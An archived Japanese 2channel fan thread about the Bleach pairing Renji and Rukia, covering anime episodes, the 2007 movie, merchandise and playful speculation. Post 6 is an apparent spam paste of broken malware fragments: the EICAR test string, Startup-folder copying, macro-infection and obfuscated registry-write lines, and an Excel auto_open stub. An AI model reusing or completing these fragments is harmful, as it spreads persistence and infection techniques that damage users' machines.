2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

BLEACHの阿散井恋次×朽木ルキアについて語るスレ2

1 :名無しさん@お腹いっぱい。:2007/11/11(日) 23:10:38 ID:iOTBkQec
BLEACHの阿散井恋次と朽木ルキアについてとことん語るスレです。

幼馴染、不遇な少年/少女時代の共有、想い合うゆえのすれ違い、
言葉にしなくても通じ合う思い、身分の差、体格差、身長差…etc.
萌え要素の詰まった二人に萌えましょう。

・マターリsage進行
・他カプの話は控えめに
・煽り・叩き・決め付けは禁止
・荒らしは華麗にスルー
・同人、同人サイト話はNG。迷惑がかかるので絶対に出さないこと
・緊急時はしたらばにて対策会議
・次スレは>>970までに話し合い>>980あたりで

■前スレ
BLEACHの阿散井恋次×朽木ルキアについて語るスレ
ttp://anime2.2ch.net/test/read.cgi/anichara2/1180635183/

■前身スレ
恋次とルキアをとことん語るスレ
ttp://anime2.2ch.net/test/read.cgi/anichara/1175590057/

2 :名無しさん@お腹いっぱい。:2007/11/11(日) 23:17:22 ID:aQeT47rL
>>1
乙〜!

3 :名無しさん@お腹いっぱい。:2007/11/11(日) 23:21:15 ID:rQKsHatx
>>1
乙です!

4 :名無しさん@お腹いっぱい。:2007/11/11(日) 23:30:06 ID:7EJqv+Ox
>>1
乙枯

5 :名無しさん@お腹いっぱい。:2007/11/11(日) 23:51:48 ID:kl8W2n7q
乙です!
ここでもマターリ恋ルキを語りましょう!


6 :名無しさん@お腹いっぱい。:2007/11/12(月) 00:48:27 ID:Ods7U1qf
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


7 :名無しさん@お腹いっぱい。:2007/11/12(月) 02:55:38 ID:64cgXYio
>>1乙!
今スレ中には原作で恋ルキが再会出来ますよーに!

8 :名無しさん@お腹いっぱい。:2007/11/12(月) 23:19:10 ID:+fk4y0fp
前スレ1000ナイス!w

9 :名無しさん@お腹いっぱい。:2007/11/12(月) 23:32:57 ID:QP3l8HiC
>>1乙っす!!
>>8同感だ(*´Д`)

10 :名無しさん@お腹いっぱい。:2007/11/12(月) 23:38:29 ID:kaQdI/q6
(;゚∀゚)=3ムッハー

1000 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/11/12(月) 23:18:17 ID:64cgXYio
1000ならルキアは恋次の嫁

11 :名無しさん@お腹いっぱい。:2007/11/13(火) 00:32:38 ID:YsLBsr5o
どうか現実になりますように(-人-)

12 :名無しさん@お腹いっぱい。:2007/11/13(火) 00:34:49 ID:QQtMgH/8
まずは12月のキャラ人気投票結果カラーで
隣同士にいるかどうかが気にかかってる
本編で会えない分、せめて表紙だけでも…!

13 :名無しさん@お腹いっぱい。:2007/11/13(火) 01:48:43 ID:4nbhYQFB
>>1乙です!
2スレ目かぁ〜。嬉しい。

14 :名無しさん@お腹いっぱい。:2007/11/13(火) 21:21:01 ID:RyCZYdZx
前スレの持ってきた

          |\/|_
. 〃⌒⌒ヽ. .イ⌒ヽ、<
.〈  /)ハ 〉.〈 二<ロ>__>
、_)d(*゚∀ノし...〈^∀^.*リノ
 ` ハyハ⊃⊂/`y'..ハ
 OU---O C----U○

15 :名無しさん@お腹いっぱい。:2007/11/13(火) 21:35:00 ID:HPu5szuc
>>1
乙です!

16 :名無しさん@お腹いっぱい。:2007/11/13(火) 23:59:48 ID:a2FG+Rpd
ジャンフェス
声優一護ルキア日番谷恋次と久保が登場
映画出番多いのかな

17 :名無しさん@お腹いっぱい。:2007/11/14(水) 00:37:29 ID:yIgS+Cc2
>>14
乙!かわいいね

18 :名無しさん@お腹いっぱい。:2007/11/14(水) 22:12:05 ID:gSDVIDtG
アニメ予告がなかった
来週メノスの森崩壊で再会かな
原作で再会が見たいよ

19 :名無しさん@お腹いっぱい。:2007/11/14(水) 23:21:22 ID:2L8/+Hx2
う〜ん…
恋ルキとして萌たらいいのかダメなのかは??だなメノスの森。
体格差や色使い、アシドの動きとか見てると恋次とルキアに見えなくもない
それと仲間の墓標の演出なんかもどことなく…
でも来週で終わりって言われるとアシドは既に故人な気もするんだよな…

とりあえずは原作でもあにぶりでも映画でもいいから
どかんと恋ルキが欲しい!

20 :名無しさん@お腹いっぱい。:2007/11/14(水) 23:38:30 ID:SqZpiHP6
ジャンフェスのJSに森田さん、おりりん、イトケン、ばくろみさんが来るから
劇場版でも恋次とルキアが見られると信じている……今は
アニ鰤では今は別行動でなかなか萌えられないけど
再会したときに何か二人の間でないかなと期待している……今は

>>19
仲間の墓標のところで、たとえ画面で描写がなくても
ルキアが戌吊にいた頃のことが
頭によぎってたらいいなとか
そのときのことがルキアの反応や言動に影響を与えているかもとちょっとオモタ

21 :名無しさん@お腹いっぱい。:2007/11/14(水) 23:57:44 ID:WX7eI7uQ
映画はあらすじ見ると恋ルキで登場みたいだし大丈夫だと思う
ただ今回かなり色んなキャラでるみたいだから、その分皆出番は少ないかもしれないけどね
恋ルキで最初から最後までずっと行動して欲しい

とりあえず今は原作で恋ルキを
1つ1つのバトルが長引きそうだから会えないで年越ししそうだ…

22 :名無しさん@お腹いっぱい。:2007/11/15(木) 18:30:39 ID:H+Q8V4Un
今年の劇場版は“帯人の脚本参加で恋ルキ一緒に登場”てのがポイント高

思ったけど、劇場版公開中は原作大きく動かせないとかナイ?
去年は十刃落ちで引っぱっる→公開終了とほぼ同時にアロニロ
だった希ガスし、今年も原作が動き出すのは明けて1月末頃と予想してみる
それより前に恋ルキがあるならその方が良いんだが、
来週バレ見ると可能性低そうだしねぇ

23 :名無しさん@お腹いっぱい。:2007/11/15(木) 23:40:53 ID:4Qct3z0Q
久保が脚本参加のほうが不安
ルキア原作で虚圏で合流でも恋次と会話ない
レギュラーキャラとの会話も殆どなかった
一緒に登場でも分かれ道提案みたいにすぐ分散させて
ルキアだけ別行動させそうそれに、恋次の扱いが
映画は情報待ちしようかな、でもローソン特典が気になる

24 :名無しさん@お腹いっぱい。:2007/11/16(金) 10:43:45 ID:vBeKDYf0
二人でレジ前のおでん買って欲しいw


25 :名無しさん@お腹いっぱい。:2007/11/16(金) 10:48:10 ID:aCXk46wU
二人でコンビニ来るって
なんとなく付き合ってるか同棲してるみたいだw
やっぱ買いかなぁ……迷う
一人一人バラバラだったらちょっとヘコむしな……

26 :名無しさん@お腹いっぱい。:2007/11/16(金) 10:58:54 ID:EyHtb7dJ
バラバラだったらしいぞ

27 :名無しさん@お腹いっぱい。:2007/11/16(金) 11:13:32 ID:aCXk46wU
>>26
CDは12月受けわたしだよね?
声優さんのブログとかに載ってたの?

28 :名無しさん@お腹いっぱい。:2007/11/16(金) 15:39:32 ID:q5zn7smP
>>24-25
背後から冷気と花びらが…

29 :名無しさん@お腹いっぱい。:2007/11/16(金) 22:47:05 ID:5acMxMxq
どちらかひとりでコンビニに行くと言うルキアに
番犬として強制的に恋次を同行させそうw
そして自分もこっそりww

ああもう来週みたいな話を恋ルキでやって欲しかったよ
色々あって出来ないのはわかってるけど見たいんだよ

30 :名無しさん@お腹いっぱい。:2007/11/16(金) 23:58:33 ID:o7AWgkcf
アニメの特典付きチケット買ったことない内容確認して
受け渡し期間に購入してもも特典つくよね?
アニメのを原作で描いてたらどうなってたのか
アニメ肩抱きカットなどやさしくない

31 :名無しさん@お腹いっぱい。:2007/11/17(土) 00:26:36 ID:q5uvvJug
>>30
確か予約期間があって、そのときに予約しないとかえなかったと思う
劇場版のHPに詳細載ってるからみてきたら?

32 :名無しさん@お腹いっぱい。:2007/11/17(土) 21:21:31 ID:X0OxMTGV
ちょっと上げるね

ルキアの治療は花太郎か
恋次は誰に治してもらえるんだろう

33 :名無しさん@お腹いっぱい。:2007/11/17(土) 21:27:06 ID:a/F8xr+6
レンジのこと、忘れないで回収してね>奪回組

34 :名無しさん@お腹いっぱい。:2007/11/17(土) 22:07:19 ID:WEzuOrXk
BLEACHアニメ,岩手県では今日やっとハイタッチシーンが見れた(*^^*)遅・・;久しぶりの恋хルキ登場で萌えた〜!!

35 :名無しさん@お腹いっぱい。:2007/11/17(土) 22:53:07 ID:Q6+D6cY6
2ちゃんに見合ったカキコしてね…;;;;;;;

36 :名無しさん@お腹いっぱい。:2007/11/17(土) 22:55:53 ID:zlZq92rU
別に…問題ない

37 :名無しさん@お腹いっぱい。:2007/11/17(土) 23:00:03 ID:q5uvvJug
>>36
之芭乙w

>>34
その前の肩抱きがカットされてたから
ハイタッチもカットされないかすごく心配してた
作画キレイでよかったよね

38 :名無しさん@お腹いっぱい。:2007/11/17(土) 23:17:20 ID:wa/ldq8F
マユリや石田が居るから回収されるだろう作者が忘れてない限り

ローソン詳細
【ナビゲートCD付】BLEACH 一般前売券\2780
ナビゲートCD付一般前売券
一護や日番谷が、オリジナルストーリーで、劇場版の魅力を徹底解析!!
出演声優さんからのメッセージや、ミニドラマなども収録予定。
<オリジナルストーリーの内容>
一護がローソンでアルバイト!?ローソン空座町店の店員となった一護の
もとに、ルキアや恋次が、お客としてやってくる!?オリジナルストーリーの
他に、劇場版BLEACHの最新情報も先取りできるナビゲートCD!
これを聴いてから劇場へ行こう!
(C)久保帯人/集英社・テレビ東京・dentsu・ぴえろ
(C)劇場版BLEACH製作委員会2007

★ローソン限定★
商品内容:一般前売券(高校生以上)1枚+CD1枚
●ナビゲートCD 尺:30分(予定) ※音声のみ
数量限定
※商品の特性上、予約商品は予約終了後のキャンセル・返品はお受けできません。予めご了承ください。
※一部上映しない地域がございますので、必ずご希望の劇場に上映の有無と期間をご確認の上、前売券のご購入をお願いいたします。
※各劇場により上映時間が異なります。ご希望の劇場、または公式HPにてご確認ください。
※写真はイメージです。デザインは変更になります。
※商品価格は税込みです。

特典30分殆ど黒崎と日番谷ぽい、来店する話10分強ぐらいかな短いから
恋次かルキア片方が来店して店でドタバタいしてる内にもう片方が来店して
合流だったら即買いだが、ルキアや恋次曖昧な言い回し

39 :名無しさん@お腹いっぱい。:2007/11/18(日) 11:42:49 ID:8mzmL9B2
恋次はアニメになると私服がダサイから嫌いなんだ・・・
まあCDだから問題ないんだけど

40 :名無しさん@お腹いっぱい。:2007/11/18(日) 13:37:05 ID:pa//HcYg
>>39もしルキアが選んでくれた服だったら恋次は着るだろうな

41 :名無しさん@お腹いっぱい。:2007/11/18(日) 15:39:45 ID:PbRxKOMf
>>39
ダサい私服はアニスタのせいだ…よね?何であんな私服着せさせたんだろうね…。

42 :名無しさん@お腹いっぱい。:2007/11/18(日) 15:47:52 ID:oYsYt0Fg
>>41
初めて現世任務についたときに現世で流行っていた服装を
そのまま使っているのかと思った
もしくは浦原の策略か

>>40
同意!
セーラー服は拒絶したけど最終的には堂々と着てくれてたしw

43 :名無しさん@お腹いっぱい。:2007/11/18(日) 16:05:12 ID:4stiZ49+
>>40
OVAではそうだったな
イチゴにダサいと言われてたがw
自分で選んで着たみたいなのは西武警察見すぎなスリーピースwwww

44 :名無しさん@お腹いっぱい。:2007/11/18(日) 17:45:46 ID:pa//HcYg
>>43
スリーピース‥そんなこともあったな
けどギャップがあっていいww

45 :名無しさん@お腹いっぱい。:2007/11/19(月) 00:53:40 ID:IGJKsaiP
みんなもしかしてあっちのスレの方にいってるんだろうか
星と野良犬久しぶりにみて泣けてきた
あんなシーンがまた見たい……

46 :名無しさん@お腹いっぱい。:2007/11/19(月) 01:54:17 ID:dq5jfcgB
>>42
あのセーラー服てルキアがチョイスしてたのか?

そいえばアニメスレで
野良犬に出てきたおにぎり死神がアシドの仲間に似てる
て言われてたけど…関係は…無いよねw

47 :名無しさん@お腹いっぱい。:2007/11/19(月) 02:03:48 ID:IGJKsaiP
>>46
セーラー服を選んだのは恋次だけど
(その他はウェディングドレス、客室乗務員の制服、ナース服)
女装してくれと頼んだのはルキア
乱菊が「ルキアが頼めば断れなくなるだろう」って企んで
ルキアを恋次のところに差し向けてた

アシドとその仲間は数百年前にメノスの森に来てたはずだから
おにぎり死神(40年前)とは違うと思われる

48 :名無しさん@お腹いっぱい。:2007/11/19(月) 02:15:52 ID:dq5jfcgB
>>47
即レスォ!そゆ意味ねw

今ちょっと野良犬見返したらほんとにそっくりだった
時系列からして同一人物はないにしても
なんでここまで似てるキャラ?とは少し思うな

49 :名無しさん@お腹いっぱい。:2007/11/19(月) 21:28:44 ID:WuD71a7i
>>43
OVAって、ジャンフェスで流れたヤツ?
ジャンフェスみてないが、恋次萌スレで服装がダサいと見た
原作で私服登場で服装がダサい、ジャンフェスはルキアが選んだ、か
選んだ可能性が消えたと嘆いていた記憶が
ジャンフェスでルキアが服装選んだ描写があったの?ルキアが雑誌読んでたからかな

アニメのタイトル過去から来た死神の意味がわからない
おにぎりの人似過ぎでアシド達過去に飛ばされたのかと思ったww

50 :名無しさん@お腹いっぱい。:2007/11/19(月) 23:04:07 ID:UWDtQlQl
調べてないけど、声優が同じだったらアニメスタッフ確信犯だよね
でもルキアと恋次があったのって50年くらい前の設定じゃないっけ

51 :名無しさん@お腹いっぱい。:2007/11/19(月) 23:52:48 ID:7KHdIBOM
>>49
そう、それ
ttp://ja.wikipedia.org/wiki/BLEACH_(%E3%82%A2%E3%83%8B%E3%83%A1)#The_sealed_sword_frenzy

ファストフード店でルキアが「わたしが着せた」と言ってた>チャッピィTシャツ
いちごには「あり得ねぇ」と言われてたがw

あれってヒッピー?

52 :名無しさん@お腹いっぱい。:2007/11/20(火) 19:11:39 ID:hQH3W8z+
アニメ恋次はヒッピーネタで遊ばれてばっかだなw
原作恋次は赤パインさえも着こなせるというのにwww

明日とその次の回以降はアニメも氷河期に突入か…
この先どこで恋ルキを補給すればいいのか途方に暮れてまうよ

53 :名無しさん@お腹いっぱい。:2007/11/20(火) 21:17:31 ID:2Pd2Ecxm
>>52
映画だ
映画に希望を託す
最近アニメでも恋ルキの関係がニュートラルになってきてるんで
一抹の不安はあるけど
それでも恋ルキ揃って登場みたいだし、望みをかける

54 :名無しさん@お腹いっぱい。:2007/11/20(火) 22:50:55 ID:GbOxoine
>>51

チャッピィTシャツルキアの差し金ww
投票で登場キャラ決めた回のOVAか
最近布だけど高いサングラス
身に付けてて恋次服装に無頓着ではなよね
それがチャッピィ柄

55 :名無しさん@お腹いっぱい。:2007/11/21(水) 15:43:12 ID:SZKQ5qlj
二人でいるところが見たいね、やっぱり。
幼馴染み萌え

56 :名無しさん@お腹いっぱい。:2007/11/21(水) 21:36:52 ID:yKVyVWed
前スレにうpしてくれてた兄めでぃあの記事にもあったけど
なんかアシド編本気でモヤモヤだった
細かく拾ってくと色々恋ルキな要素イパーイな気もするんだが
匂わすだけで肝心な所が全部オアズケウヤムヤなのでもうモヤッとするしか
しかもコレおそらく永遠に回収されることはないんだろうな…

原作は原作でまた恋次が不憫でならない。・゚・(ノД`)・゚・。

57 :名無しさん@お腹いっぱい。:2007/11/21(水) 22:11:33 ID:aMllMlFd
アシド、生き残って本編に出てきたりして
そして十三番隊副隊長になって、ルキアと(ry

なんてないよねw
アシドにくっついてたルキア可愛かった
適当にアシドを恋次に変換してみてたが……この際アシドでもいいか

58 :名無しさん@お腹いっぱい。:2007/11/21(水) 22:38:48 ID:VTuKHyC0
>>56
アシド編は原作ではなかった話だから個人的に置いとくとして、(というか見ていない)
原作の恋次は不憫だよね。副隊長なんだし一人で戦ってほしかった、というのもある。

59 :名無しさん@お腹いっぱい。:2007/11/21(水) 22:42:30 ID:JNL6YONS
>>57
結局誰でもいいのか

60 :名無しさん@お腹いっぱい。:2007/11/21(水) 22:49:09 ID:Jn5cDJqU
>>58
アポロ戦は師匠の計画性のなさが悪い方にでちゃったね…
恋次カワイソス

61 :名無しさん@お腹いっぱい。:2007/11/21(水) 23:51:41 ID:3diXA674
ゾマリ戦なぁ…
あの場に恋次が居てくれたらと
どんだけ願った事か…orz

結局どうとでもとって下さい。
で終わったなアシド
自分は恋ルキの前世やと思ってたわw

62 :名無しさん@お腹いっぱい。:2007/11/22(木) 00:00:13 ID:hjVuuI+U
アニメ恋次、ルキアのこと忘れてなかったが遅い感が・・

63 :名無しさん@お腹いっぱい。:2007/11/22(木) 18:17:01 ID:63yp6ihp
>>61
前世はわかんないけど、
キャラデからして恋次とルキアを足して割った感じはするかもね
ま、この先の展開からしても個人的にアニ鰤は劇場版までかな
あとは原作に集中しよ

64 :名無しさん@お腹いっぱい。:2007/11/22(木) 18:23:13 ID:xRvyhwAl
私は一回アニメで無くなった肩とか恋次の台詞が大抵ルキア関連なことに萌え萌えしてたけどなぁ。このスレでは微妙みたいだね

65 :名無しさん@お腹いっぱい。:2007/11/22(木) 21:36:19 ID:b8ZYvzTq
<<64
確かに恋次はルキア関連なことが多いんだけど、ルキアの方からはサパーリ
な感じがするんだよね。もうちょっと構ってほしい…かな

66 :名無しさん@お腹いっぱい。:2007/11/22(木) 22:06:17 ID:0tyDTXIa
ttp://imepita.jp/20071122/795300

ぜひセコンドはルキアで!

67 :名無しさん@お腹いっぱい。:2007/11/22(木) 23:16:05 ID:YRJDZ3jL
いい夫婦の日記念真紀子w
戌吊夫婦に幸多からんことを…!!

>>66
英語の煽り文と作中の恋次の状態が正反対すぎww
表紙だけでなくて、本編でも立ち上がってルキアのために戦ってくれよ〜!

68 :名無しさん@お腹いっぱい。:2007/11/23(金) 14:53:08 ID:SxL5suE3
まったくだ!石田と漫才している場合か
本当ならなにをおいてもルキアを助けに行くと思うんだけど
作者あああああ

69 :名無しさん@お腹いっぱい。:2007/11/23(金) 16:51:54 ID:FgHJQeYj
嘘バレかもだけど再来週にはマユリ戦開始らしいし、そこで恋次がどう動いてるかですな
恋次が死神でいる理由とか原因の9割がゾマリ方面にまとまってるんですけどねぇ…
ホントにねぇ…

70 :名無しさん@お腹いっぱい。:2007/11/24(土) 13:01:10 ID:4lvqhtKO
そもそもアポロルームは
まわり霊圧を遮断する仕掛けとかじゃないのか?

アポロの落とし穴に落ちる前と
部屋の中にいる時とで
ルキアセンサーの精度に差ありすぎる

71 :名無しさん@お腹いっぱい。:2007/11/24(土) 17:27:44 ID:YTrnN+i8
なるほど。

72 :名無しさん@お腹いっぱい。:2007/11/24(土) 23:24:05 ID:DGn2ntRU
>>70
部屋から脱出してはじめてルキアの霊圧が消えかけなのに気付いた恋次はハゲシク動揺
その隙をつかれてあっさり人形化、で今。だったら良いのになあ

73 :名無しさん@お腹いっぱい。:2007/11/25(日) 12:40:24 ID:FolxfJpx
三巻でコンが友達云々いってルキアが考え込んだのは
恋次の事思い出してたのかね

74 :名無しさん@お腹いっぱい。:2007/11/25(日) 18:29:02 ID:ks4RdyGd
>>73
そうだと思ってた
何巻か忘れたけど、ラジコンでゲストにルキアがでてるときに
恋次がご飯持ってきて乱入したけど、あの流れも恋次だよね
戌吊にいたころにルキアにまかせてられなくて恋次が食事作ってたってエピあったけど
そのころ思い出しながらルキアのご飯、恋次が自分で作ってきたんだろうかって思った

75 :名無しさん@自治スレでローカルルール変更議論中:2007/11/25(日) 23:03:34 ID:MjCqwIg7
恋次というだけに料理はお任せ
電子レンジ                      チーン orz

76 :名無しさん@自治スレでローカルルール変更議論中:2007/11/26(月) 10:52:42 ID:DKsZxvfB
(゚Д゚≡゚Д゚) どした!スレが冷え切ってるぞ!

77 :名無しさん@自治スレでローカルルール変更議論中:2007/11/26(月) 12:05:36 ID:DP7+SKeD
|∀゚) コソーリ…

|∀゚)つホッカイロ(スレ用)

|∀゚)つ阿散井恋次(朽木ルキアさん用)

|彡サッ


78 :名無しさん@自治スレでローカルルール変更議論中:2007/11/26(月) 18:43:19 ID:pzNfjxP0
>>77
なごんだ。ありがと
どこまででも戌吊夫婦を応援しようと思う

79 :名無しさん@自治スレでローカルルール変更議論中:2007/11/26(月) 19:02:10 ID:hCbVvn74
  +    _N\/|A
       > ,イ⌒ 〃⌒⌒ヽ   ・゜゚・*:.゚・*:.。. .。.:*
      < (ミ匸文lフ /)ハ  〉
       ∠ヾル ´∀(゚∀゚ *リし  +
         /ハyハ ⊂ハ )  
+       (__X__)((_ソ⊃   +

  
恋次は体温高そうだ
冷え性っぽいイメージのあるルキアをあっためてやればいいよ

80 :名無しさん@自治スレでローカルルール変更議論中:2007/11/26(月) 20:15:18 ID:f+4tW6NG
>>77
自分もなごみました
>>79
かっ…カワユスなぁ
あれ、何故か目から汗が

81 :名無しさん@自治スレでローカルルール変更議論中:2007/11/26(月) 23:48:53 ID:BDb7vVwz
この名前欄は一体。
今週で恋次とルキア一緒のとこ当分見納め
原作で再会早く来いー

82 :名無しさん@自治スレでローカルルール変更議論中:2007/11/26(月) 23:52:35 ID:kOX32P0J
恋次っていびきうるさそう

83 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 00:11:15 ID:VkfFF77d
>>82
夜中に眼が覚めて「うるさいな」と横で寝ている恋次の鼻をつまむルキア想像したw

84 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 00:27:31 ID:2o92m7ep
んがぁぁああ・・・・・・ぐぉおおお・・・

んごッ・・・

・・・ッ・・・!・・・ッッ・・・!!!

(がばっ)
ぶはぁっ!!
馬鹿野郎!!息止めの新記録に挑戦中か俺は!!

85 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 00:28:59 ID:2o92m7ep
あ、口開いてたら息できるかw

86 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 12:18:05 ID:BlNJoDqa
>>84-85
禿しくワロタw

ルキアが半分寝ぼけてて両手で鼻と口をおさえてたらこれもおk
怒鳴られてもねぼけてるから「?」としか反応できないルキアw

87 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 18:57:22 ID:2VO3/ymS
布団別でも寝てる間に無意識で恋次の布団にはいっちゃえばいいよ…!

88 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 20:00:22 ID:fXC20HIK
そして逃げだす恋次

89 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 20:00:37 ID:VbeSxnOO
恋次はルキアの抱き枕にされればいい。
「誰かさんの子供体温は寝心地がいいな」
「……オイ」

90 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 22:35:00 ID:WDo+C1yM
>>88
それは朝まで何もしないまま我慢できそうにないからですか?w

>>89
萌えたw

91 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 00:26:20 ID:e4tvrlhe
結婚するとしたら何十年かかるんだろうw
「お前らいつになったら結婚するんだよ」とか周りから言われてたらいいな
恋次が真剣に悩んでたら萌える
意外とルキアが待ってたりして

92 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 00:51:37 ID:6uY78m8s
>>89
け、けしからん!実に…
萌える!
本当にありがとうございました

93 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 03:05:59 ID:p+Nn7vgf
>>89
子供体温って何?
恋次の体温が高めってこと?

94 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 08:58:12 ID:WFEZzH5M
>>93
子供の体温はあったかめだからそう言い表したりする事がある。また体温が高いこととかのたとえ

95 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 23:45:44 ID:Gph11TzC
手の温度が高くて握ってると眠くなってくるんだよな>子供体温

アニ鰤は原作以上に恋ルキが会話してくれててヨカタw
次回予告やり取りもなかなかww
ただもう、これで当分の間一緒にいる恋ルキは見納めと思うと…

96 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 00:44:37 ID:duHPAPq4
最近は早く結婚してくれと願うばかり。くっそぅせめて同じコマor同じ画面に二人を…!しかし実際は同じページでもきっと喜ぶだろう自分は負け組なのか


97 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 02:52:46 ID:aPfkhwDu
>>94
てっきり恋次のムスコの体温かとオモタ


98 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 07:32:39 ID:92F7ZZuk
こらこらこらw

99 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 11:10:28 ID:duHPAPq4
>>97
ちょ……ww>>94は自分だが、おもきしふいたじゃないかw

100 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 13:39:54 ID:9k8HKFwT
>>97
ちょ………GJ!
その発想はなかったわwww

>>96
自分もだ…
たぶん、恋次がルキアの名前をだすだけでも満足できそうな自分は負け組

101 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 17:34:14 ID:Lav1QU3k
>>95
アニメ見れない自分にkwsk

102 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 21:53:43 ID:hxP5Gcho
アニメ恋次かルキアが登場しそうな頃合いで
チャンネル変えてたからちゃんと見てない
オリスト挟んでたのかorz

103 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 22:00:32 ID:NhjLpK8I
>>101,102
こんな感じ

ルキア「恋次、今まであの掛け声をやったことはあるのか?」
恋次「いや、何回も隊長に提案してんだけど、何故か無視されんだよなぁ
    ルキア、お前からも頼んどいてくれや」
ルキア「いや…。それは……」
一護「白哉がやってくれると思ってんのかよ……」

つべなんかでBLEACH 151 preview で検索すると出てくると思う

104 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 22:58:12 ID:NX8p9BZV
>>97
笑ったw …電車の中なのに

105 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 23:54:25 ID:hxP5Gcho
>103
お疲れ
ちょw恋次服装に続きセンスまで…

106 :名無しさん@自治スレでローカルルール変更議論中:2007/11/30(金) 23:45:35 ID:OvtfAAZn
ああもう12月なのね…

本誌でいまだ再会出来んくても
劇場版に恋ルキあったら
少しは耐えられるのにな

107 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 01:57:50 ID:1TNwYPCJ
バレ見た
この調子だと、兄様に結婚の許しを得るのは相当難しそうだ…
同じ兄様に認められた同士だと思うと、ちょっと萌えるけど

108 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 18:52:11 ID:dxwhw6ss
>>107
「妹さんを俺にください!」が正攻法だがな。しかし兄様が許すともおもえんので、やはり倒すしか(ry
朽木兄妹にミゾが無くなっていくほど恋次の肩身が狭くなるって寸法なのかww

109 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 21:40:38 ID:96rCO9V5
別に許しをもらわなくてもいいような気もする。押し切ってみるのも一興。
かくいう兄様自身が、周りの反対に逆らって緋真と結婚してるわけだしなwそこら辺の事は自分が良く分かってるだろうし。
誰にしろ認めている相手の意思は、尊重してくれる人だと思うけど。
虚圏に二人を送り出してくれたようにさ。


110 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 22:02:26 ID:MD9inZxF
恋次「妹さんを俺にください!」
白哉「ルキアは物ではない」
恋次「じゃあ俺をあげますから結婚させてください!」
白哉「…いらぬ」

とか。
うろ覚えなんだけど、なんかの漫画でこんな感じのやりとりがあった気がするんだ。

111 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 00:00:20 ID:vJM/+lKI
席官の件みるとルキアの意識尊重しなかった事での
失敗を踏まえて白哉が恋次を護衛につけたようにみえてきた

112 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 00:37:38 ID:u15/83xV
十三番隊の平隊員にどーして六番隊副隊長が護衛につくのかと
双方の隊長は何考えてるんだと
言われてないのかなー

十三番隊になったのは、あそこの隊長なら無茶な使い方すまい、
という計算があったからかな。
でもルキアの性格じゃ大人しく平隊員のノルマこなしてるだけで収まらなかった。
そんなに気になるなら
もう六番隊にひっこぬいて、隊長の側においとけよ、兄さまwww
そうすりゃ副隊長も鉄砲玉みたいに消えないしw

113 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 01:01:57 ID:9x+44Mzf
>>110
ちょw前半まったくおなじこと想像してたw

>>112
兄様が十三番隊選んだ理由に同意
自分とこには、ルキアが死神になった時点ではまだ隊長じゃなかったからじゃないかな
直後に隊長になったみたいだけど
根回しとかも含めて考えてみたら十三番隊しか無理そうな感じがした

一番隊:親衛隊みたいなイメージ、ルキアには荷が重そう、さすがに山爺には口出しできない
二番隊:隠密機動はルキアには無理
三番隊:とんでもない(新しい隊長が)、前の隊長が代替わりしそうな時期にまかせられない
四番隊:ルキアが満足しなさそう
五番隊:おっさんが油断ならん
六番隊:前の隊長が代替わりしそうな時期にまかせられない
七番隊:編み笠の下が謎
八番隊:とんでもない
九番隊:コネがない
十番隊:前の隊長が(ry
十一番隊:とんでもない
十二番隊:とんでもない
十三番隊:口利きができる

114 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 01:09:06 ID:SY76E/WM
あー、浮竹隊長と兄様昔からの知り合いっぽかったしな。だが二番隊はたしか普通の隊だった気が…(隠密の機関はまた別だろ)
なんにせよ、恋次には義兄という壁が待ち構えているわけだ。もう駆け落ちしかないのか…w

